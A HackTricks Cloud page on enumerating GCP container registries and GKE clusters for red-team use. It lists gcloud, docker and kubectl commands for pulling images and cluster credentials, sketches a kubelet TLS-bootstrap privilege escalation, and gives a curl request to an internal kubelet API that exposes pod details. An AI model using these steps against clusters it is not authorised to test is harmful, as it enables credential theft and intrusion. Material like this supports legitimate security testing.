{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
In GCP containers you can find most of the containers based services GCP offers, here you can see how to enumerate the most common ones:
gcloud container images list
gcloud container images list --repository us.gcr.io/<project-name> #Search in other subdomains repositories
gcloud container images describe <name>
gcloud container subnets list-usable
gcloud container clusters list
gcloud container clusters describe <name>
gcloud container clusters get-credentials [NAME]
# Run a container locally
docker run --rm -ti gcr.io/<project-name>/secret:v1 sh
# Login & Download
sudo docker login -u oauth2accesstoken -p $(gcloud auth print-access-token) https://HOSTNAME
## where HOSTNAME is gcr.io, us.gcr.io, eu.gcr.io, or asia.gcr.io.
sudo docker pull HOSTNAME/<project-name>/<image-name>
In the following page you can check how to abuse container permissions to escalate privileges:
{% content-ref url="../gcp-privilege-escalation/gcp-container-privesc.md" %} gcp-container-privesc.md {% endcontent-ref %}
These are the pool of machines (nodes) that form the kubernetes clusters.
# Pool of machines used by the cluster
gcloud container node-pools list --zone <zone> --cluster <cluster>
gcloud container node-pools describe --cluster <cluster> --zone <zone> <node-pool>
For information about what is Kubernetes check this page:
{% content-ref url="../../kubernetes-security/" %} kubernetes-security {% endcontent-ref %}
First, you can check to see if any Kubernetes clusters exist in your project.
gcloud container clusters list
If you do have a cluster, you can have gcloud
automatically configure your ~/.kube/config
file. This file is used to authenticate you when you use kubectl, the native CLI for interacting with K8s clusters. Try this command.
gcloud container clusters get-credentials [CLUSTER NAME] --region [REGION]
Then, take a look at the ~/.kube/config
file to see the generated credentials. This file will be used to automatically refresh access tokens based on the same identity that your active gcloud
session is using. This of course requires the correct permissions in place.
Once this is set up, you can try the following command to get the cluster configuration.
kubectl cluster-info
You can read more about gcloud
for containers here.
This is a simple script to enumerate kubernetes in GCP: https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_k8s_enum
Initially this privilege escalation technique allowed to privesc inside the GKE cluster effectively allowing an attacker to fully compromise it.
This is because GKE provides TLS Bootstrap credentials in the metadata, which is accessible by anyone by just compromising a pod.
The technique used is explained in the following posts:
- https://www.4armed.com/blog/hacking-kubelet-on-gke/
- https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
- https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/
Ans this tool was created to automate the process: https://github.com/4ARMED/kubeletmein
However, the technique abused the fact that with the metadata credentials it was possible to generate a CSR (Certificate Signing Request) for a new node, which was automatically approved.
In my test I checked that those requests aren't automatically approved anymore, so I'm not sure if this technique is still valid.
In this post it was discovered it was discovered a Kubelet API address accesible from inside a pod in GKE giving the details of the pods running:
curl -v -k http://10.124.200.1:10255/pods
Even if the API doesn't allow to modify resources, it could be possible to find sensitive information in the response. The endpoint /pods was found using Kiterunner.
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.